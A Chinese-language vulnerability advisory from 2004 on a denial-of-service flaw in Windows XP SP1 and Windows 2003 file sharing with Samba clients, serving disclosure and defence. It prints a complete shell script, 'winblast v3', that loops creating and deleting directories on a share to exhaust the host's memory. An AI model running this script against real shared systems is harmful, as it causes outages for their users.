Microsoft Windows Samba文件共享资源耗竭漏洞
发布日期:2004-01-21
更新日期:2004-02-03
受影响系统:Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1
Microsoft Windows 2003
不受影响系统:Microsoft Windows 2000
描述:
BUGTRAQ ID:
9467
Microsoft Windows是一款微软开发的操作系统。
Microsoft Windows通过Samba进行文件共享时存在漏洞,远程攻击者可以利用这个漏洞进行资源耗竭攻击,可导致拒绝服务。
如果系统使用运行Samba的Unix客户端启用文件共享,拥有写/建立权限的Unix客户端用户可使Windows系统产生资源耗竭。
通过在共享上建立和删除1000个目录可触发此问题。当超多目录(如3百多万或更多)被删除和建立可造成内存耗竭。
<*来源:Daniel Kabs (
daniel.kabs@gmx.de)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Daniel Kabs (
daniel.kabs@gmx.de)提供了如下测试方法:
#!/bin/sh
# winblast v3 - DoS on WinXP, Win2003Srv
# 2003-12-04 Steve Ladjabi
count=0
# using 'pathcount' directories
pathcount=1000
echo running \'winblast v3\' with $pathcount files in loop ...
while [ 1 ]; do
p=$((pathcount*2-1))
stop=$((pathcount-1))
while [ "$p" != "$stop" ]; do
dirname=wbst$p
# delete old directory if it exists and exit on any error
if [ -d $dirname ]; then
rmdir $dirname || exit 3
fi;
# generating directory and exit on any error
mkdir $dirname || exit 1
p=$((p-1))
count=$((count+1))
done;
echo $count directories generated ...
done;
#-- end --
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/浏览次数:3231
严重程度:0(网友投票)
